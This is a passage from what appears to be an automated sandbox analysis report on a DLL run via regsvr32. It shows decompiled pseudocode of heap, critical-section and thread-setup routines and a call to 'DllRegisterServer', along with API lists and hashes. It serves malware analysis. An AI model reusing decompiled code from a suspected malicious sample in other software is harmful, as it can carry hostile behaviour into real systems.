							_t34 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
						}
						_t36 = _t85 + 0x10; // 0x2f46400
						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
						_t40 = _t82 + 1; // 0x4
						 *((intOrPtr*)(_t85 + 8)) = _t40;
						LeaveCriticalSection(_v8);
						return _t82;
					} else {
						goto L6;
					}
				}
			}

























                                                                        0x10037446
                                                                        0x10037447
                                                                        0x10037449
                                                                        0x1003744a
                                                                        0x1003744d
                                                                        0x1003744f
                                                                        0x1003744f
                                                                        0x10037454
                                                                        0x10037457
                                                                        0x1003745d
                                                                        0x1003745d
                                                                        0x10037460
                                                                        0x10037465
                                                                        0x10037474
                                                                        0x10037476
                                                                        0x10037479
                                                                        0x10037496
                                                                        0x10037496
                                                                        0x10037496
                                                                        0x10037499
                                                                        0x10037499
                                                                        0x1003749e
                                                                        0x100374b1
                                                                        0x100374b8
                                                                        0x100374bb
                                                                        0x100374cf
                                                                        0x100374a0
                                                                        0x100374a8
                                                                        0x100374a8
                                                                        0x100374d7
                                                                        0x100374fd
                                                                        0x10037503
                                                                        0x1003750e
                                                                        0x10037517
                                                                        0x10037522
                                                                        0x10037525
                                                                        0x00000000
                                                                        0x100374d9
                                                                        0x100374d9
                                                                        0x100374d9
                                                                        0x100374de
                                                                        0x100374e8
                                                                        0x100374e8
                                                                        0x100374f1
                                                                        0x1001ce3b
                                                                        0x1001ce3c
                                                                        0x1001ce3e
                                                                        0x1001ce48
                                                                        0x1001ce4f
                                                                        0x1001ce54
                                                                        0x1001ce55
                                                                        0x1001ce56
                                                                        0x1001ce58
                                                                        0x1001ce62
                                                                        0x1001ce69
                                                                        0x1001ce6e
                                                                        0x1001ce6f
                                                                        0x1001ce72
                                                                        0x1001ce7c
                                                                        0x1001ce83
                                                                        0x1001ce88
                                                                        0x1001ce8c
                                                                        0x1001ce8c
                                                                        0x1003747b
                                                                        0x1003747b
                                                                        0x1003747e
                                                                        0x10037481
                                                                        0x10037486
                                                                        0x10037487
                                                                        0x1003748c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003748c
                                                                        0x10037490
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10037490
                                                                        0x10037467
                                                                        0x10037467
                                                                        0x10037467
                                                                        0x1003746e
                                                                        0x10037528
                                                                        0x10037528
                                                                        0x1003752b
                                                                        0x1003752d
                                                                        0x10037530
                                                                        0x10037530
                                                                        0x10037533
                                                                        0x1003753c
                                                                        0x1003753f
                                                                        0x10037542
                                                                        0x10037545
                                                                        0x10037551
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003746e

                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                        • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                        • GlobalHandle.KERNEL32(02F46400), ref: 100374B1
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                        • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                        • GlobalHandle.KERNEL32(02F46400), ref: 100374E1
                                                                        • GlobalLock.KERNEL32 ref: 100374E8
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                        • GlobalLock.KERNEL32 ref: 100374FD
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                        • String ID:
                                                                        • API String ID: 2667261700-0
                                                                        • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                        • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10013AD4 Relevance: 7.5, APIs: 5, Instructions: 40memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 100%
                                                                        			E10013AD4() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x10050a64 == 3) {
					_t8 = 0;
					_t21 =  *0x10050a48 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x10050a4c; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x10050a60, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x10050a48; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x10050a60, 0,  *0x10050a4c);
				}
				_t2 = HeapDestroy( *0x10050a60); // executed
				return _t2;
			}









                                                                        0x10013adb
                                                                        0x10013ade
                                                                        0x10013ae0
                                                                        0x10013aed
                                                                        0x10013af0
                                                                        0x10013afd
                                                                        0x10013b00
                                                                        0x10013b0c
                                                                        0x10013b17
                                                                        0x10013b24
                                                                        0x10013b26
                                                                        0x10013b29
                                                                        0x10013b2a
                                                                        0x10013b2a
                                                                        0x10013b33
                                                                        0x10013b42
                                                                        0x10013b45
                                                                        0x10013b4c
                                                                        0x10013b52

                                                                        APIs
                                                                        • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                        • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                        • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                        • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                        • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Heap$Virtual$Destroy
                                                                        • String ID:
                                                                        • API String ID: 782257640-0
                                                                        • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                        • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100350EA Relevance: 4.6, APIs: 3, Instructions: 60threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E100350EA(intOrPtr __ecx, void* __eflags) {
				void* _t37;
				intOrPtr _t54;
				void* _t56;

				E10011BF0(0x1003a421, _t56);
				_push(__ecx);
				_t54 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E10035766(__ecx, __eflags); // executed
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1003d6fc;
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				} else {
					 *((intOrPtr*)(_t54 + 0x4c)) = E10011F76( *((intOrPtr*)(_t56 + 8)));
				}
				_t37 = E100373B5();
				_t44 = _t37;
				_push(0x10035062);
				_t7 = _t44 + 0x1070; // 0x1070
				 *((intOrPtr*)(E10037855(_t7) + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x28)) = GetCurrentThread();
				 *((intOrPtr*)(_t54 + 0x2c)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t37 + 4)) = _t54;
				 *((intOrPtr*)(_t54 + 0x40)) = 0;
				 *((intOrPtr*)(_t54 + 0x78)) = 0;
				 *((intOrPtr*)(_t54 + 0x60)) = 0;
				 *((intOrPtr*)(_t54 + 0x64)) = 0;
				 *((intOrPtr*)(_t54 + 0x50)) = 0;
				 *((intOrPtr*)(_t54 + 0x5c)) = 0;
				 *((intOrPtr*)(_t54 + 0x84)) = 0;
				 *((intOrPtr*)(_t54 + 0x54)) = 0;
				 *((short*)(_t54 + 0x8e)) = 0;
				 *((short*)(_t54 + 0x8c)) = 0;
				 *((intOrPtr*)(_t54 + 0x44)) = 0;
				 *((intOrPtr*)(_t54 + 0x88)) = 0;
				 *((intOrPtr*)(_t54 + 0x7c)) = 0;
				 *((intOrPtr*)(_t54 + 0x80)) = 0;
				 *((intOrPtr*)(_t54 + 0x6c)) = 0;
				 *((intOrPtr*)(_t54 + 0x70)) = 0;
				 *((intOrPtr*)(_t54 + 0x90)) = 0;
				 *((intOrPtr*)(_t54 + 0x98)) = 0;
				 *((intOrPtr*)(_t54 + 0x58)) = 0;
				 *((intOrPtr*)(_t54 + 0x68)) = 0;
				 *((intOrPtr*)(_t54 + 0x94)) = 0x200;
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return _t54;
			}






                                                                        0x100350ef
                                                                        0x100350f4
                                                                        0x100350f7
                                                                        0x100350fa
                                                                        0x100350fd
                                                                        0x10035107
                                                                        0x1003510a
                                                                        0x10035110
                                                                        0x10035120
                                                                        0x10035112
                                                                        0x1003511b
                                                                        0x1003511b
                                                                        0x10035123
                                                                        0x10035128
                                                                        0x1003512a
                                                                        0x1003512f
                                                                        0x1003513a
                                                                        0x10035143
                                                                        0x1003514f
                                                                        0x10035152
                                                                        0x10035155
                                                                        0x10035158
                                                                        0x1003515b
                                                                        0x1003515e
                                                                        0x10035161
                                                                        0x10035164
                                                                        0x10035167
                                                                        0x1003516d
                                                                        0x10035170
                                                                        0x10035177
                                                                        0x1003517e
                                                                        0x10035181
                                                                        0x10035187
                                                                        0x1003518a
                                                                        0x10035190
                                                                        0x10035193
                                                                        0x10035196
                                                                        0x1003519c
                                                                        0x100351a2
                                                                        0x100351a5
                                                                        0x100351a9
                                                                        0x100351b7
                                                                        0x100351bf

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 100350EF
                                                                          • Part of subcall function 10035766: __EH_prolog.LIBCMT ref: 1003576B
                                                                        • GetCurrentThread.KERNEL32 ref: 1003513D
                                                                        • GetCurrentThreadId.KERNEL32 ref: 10035146
                                                                          • Part of subcall function 10011F76: _strlen.LIBCMT ref: 10011F80
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentH_prologThread$_strlen
                                                                        • String ID:
                                                                        • API String ID: 1650857145-0
                                                                        • Opcode ID: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction ID: 61552a51ecdf068f7bb4f9f9d17d647312d48b00674ee0c1313581d8a4369c28
                                                                        • Opcode Fuzzy Hash: 13c4d0bfe4e49a05eeefd7c6bf2b263d4877e9863c50d650f7a16d428fdcbe59
                                                                        • Instruction Fuzzy Hash: 44218CB0800B509FD321CF6AD44569AFBF8FFA4641F10891FE5AA8BB21CBB5A541CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10005090 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 172 10005090-10005097 173 100050a0-100050ab call 10004780 172->173 174 10005099-1000509a ExitProcess 172->174 177 100050b0-100050b2 173->177
                                                                        C-Code - Quality: 64%
                                                                        			E10005090() {
				int _t1;

				_t1 =  *0x1004d408; // 0x2f0ec70
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004780()))(); // executed
				return 0;
			}




                                                                        0x10005090
                                                                        0x10005097
                                                                        0x1000509a
                                                                        0x1000509a
                                                                        0x100050a0
                                                                        0x100050a5
                                                                        0x100050ae
                                                                        0x100050b2

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: DllRegisterServer
                                                                        • API String ID: 621844428-1663957109
                                                                        • Opcode ID: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction ID: 3990abb4a36e91ec48151b626d133cf46f0332b691c0db4f0bfff747b4acf562
                                                                        • Opcode Fuzzy Hash: b647243c56f9d481d32e78aa1d87db03068239a097e62da1c51105cdb9ab7326
                                                                        • Instruction Fuzzy Hash: 5BC08CB1A002191BE601EBF29C8CE0B329C8B801877020414F100D2005EF30E10002A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001382A Relevance: 3.1, APIs: 2, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 178 1001382a-10013842 call 10012514 181 10013845-1001384d 178->181 182 10013844 178->182 183 100138b4-100138b6 181->183 184 1001384f-10013856 181->184 182->181 187 100138b8-100138be 183->187 188 100138dd 183->188 185 10013858-1001386a 184->185 186 1001389f-100138a1 184->186 185->186 189 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 185->189 186->188 191 100138a3-100138b2 RtlAllocateHeap 186->191 187->188 192 100138c0-100138c9 call 10014676 187->192 190 100138df-100138e4 call 1001254f 188->190 189->191 204 10013891-1001389c call 10011c50 189->204 191->183 192->181 199 100138cf 192->199 199->190 204->186
                                                                        C-Code - Quality: 76%
                                                                        			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x10041e40);
				E10012514(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1004f58c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E1001254F(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x10050a64 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x10050a50; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10013A38(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E1001437A();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100138D4();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10011C50(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10014676(_t31) != 0);
				goto L14;
			}









                                                                        0x1001382a
                                                                        0x1001382c
                                                                        0x10013831
                                                                        0x10013839
                                                                        0x1001383d
                                                                        0x10013842
                                                                        0x10013844
                                                                        0x10013844
                                                                        0x10013845
                                                                        0x10013845
                                                                        0x10013847
                                                                        0x1001384d
                                                                        0x100138b4
                                                                        0x100138b6
                                                                        0x100138dd
                                                                        0x100138dd
                                                                        0x100138df
                                                                        0x100138e4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100138b6
                                                                        0x10013856
                                                                        0x1001389f
                                                                        0x100138a1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100138a3
                                                                        0x100138ac
                                                                        0x100138b2
                                                                        0x00000000
                                                                        0x100138b2
                                                                        0x1001385b
                                                                        0x1001385e
                                                                        0x10013861
                                                                        0x10013864
                                                                        0x1001386a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001386e
                                                                        0x10013874
                                                                        0x10013877
                                                                        0x1001387e
                                                                        0x10013881
                                                                        0x10013885
                                                                        0x1001388a
                                                                        0x1001388f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013897
                                                                        0x1001389c
                                                                        0x00000000
                                                                        0x100138c0
                                                                        0x100138c7
                                                                        0x00000000

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 1001386E
                                                                        • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap__lock
                                                                        • String ID:
                                                                        • API String ID: 4078605025-0
                                                                        • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                        • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                        • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100107C8 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 207 100107c8-100107d9 call 10012514 210 10010833-10010838 call 1001254f 207->210 211 100107db-100107e2 207->211 213 10010824 211->213 214 100107e4-100107fc call 10013a38 call 10013b9b 211->214 215 10010825-1001082d RtlFreeHeap 213->215 221 10010807-10010814 call 1001081b 214->221 222 100107fe-10010806 call 10013bc6 214->222 215->210 221->210 227 10010816-10010819 221->227 222->221 227->215
                                                                        C-Code - Quality: 18%
                                                                        			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t9;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x10041d10);
				_t9 = E10012514(__ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x10050a64 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10013B9B(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10013BC6();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001081B();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x10050a60); // executed
						}
					}
				}
				return E1001254F(_t9);
			}







                                                                        0x100107c8
                                                                        0x100107ca
                                                                        0x100107cf
                                                                        0x100107d4
                                                                        0x100107d9
                                                                        0x100107e2
                                                                        0x10010824
                                                                        0x00000000
                                                                        0x100107e4
                                                                        0x100107e6
                                                                        0x100107ec
                                                                        0x100107f1
                                                                        0x100107f7
                                                                        0x100107fc
                                                                        0x100107fe
                                                                        0x100107ff
                                                                        0x10010800
                                                                        0x10010806
                                                                        0x10010807
                                                                        0x1001080b
                                                                        0x10010814
                                                                        0x10010816
                                                                        0x10010825
                                                                        0x10010825
                                                                        0x1001082d
                                                                        0x1001082d
                                                                        0x10010814
                                                                        0x100107e2
                                                                        0x10010838

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterFreeHeapSection__lock
                                                                        • String ID:
                                                                        • API String ID: 3012239193-0
                                                                        • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
                                                                        • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                        • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001070F Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 228 1001070f-10010725 call 10012514 231 10010755-10010757 228->231 232 10010727-1001072d 228->232 233 10010759 231->233 234 1001075a-10010761 231->234 232->231 235 1001072f-10010753 call 10013a38 call 1001437a call 10010781 232->235 233->234 236 10010763-10010766 234->236 237 10010769-10010772 RtlAllocateHeap 234->237 235->231 239 10010778-1001077d call 1001254f 235->239 236->237 237->239
                                                                        C-Code - Quality: 63%
                                                                        			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x10041d00);
				E10012514(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x10050a64 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x10050a64 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x10050a50; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E1001437A();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E10010781();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E1001254F(_t9);
			}






                                                                        0x1001070f
                                                                        0x10010711
                                                                        0x10010716
                                                                        0x1001071b
                                                                        0x10010725
                                                                        0x10010755
                                                                        0x10010757
                                                                        0x10010759
                                                                        0x10010759
                                                                        0x10010761
                                                                        0x10010766
                                                                        0x10010766
                                                                        0x10010772
                                                                        0x10010727
                                                                        0x10010727
                                                                        0x1001072d
                                                                        0x00000000
                                                                        0x1001072f
                                                                        0x10010731
                                                                        0x10010737
                                                                        0x1001073b
                                                                        0x10010742
                                                                        0x10010745
                                                                        0x10010749
                                                                        0x1001074e
                                                                        0x10010753
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10010753
                                                                        0x1001072d
                                                                        0x1001077d

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10010731
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
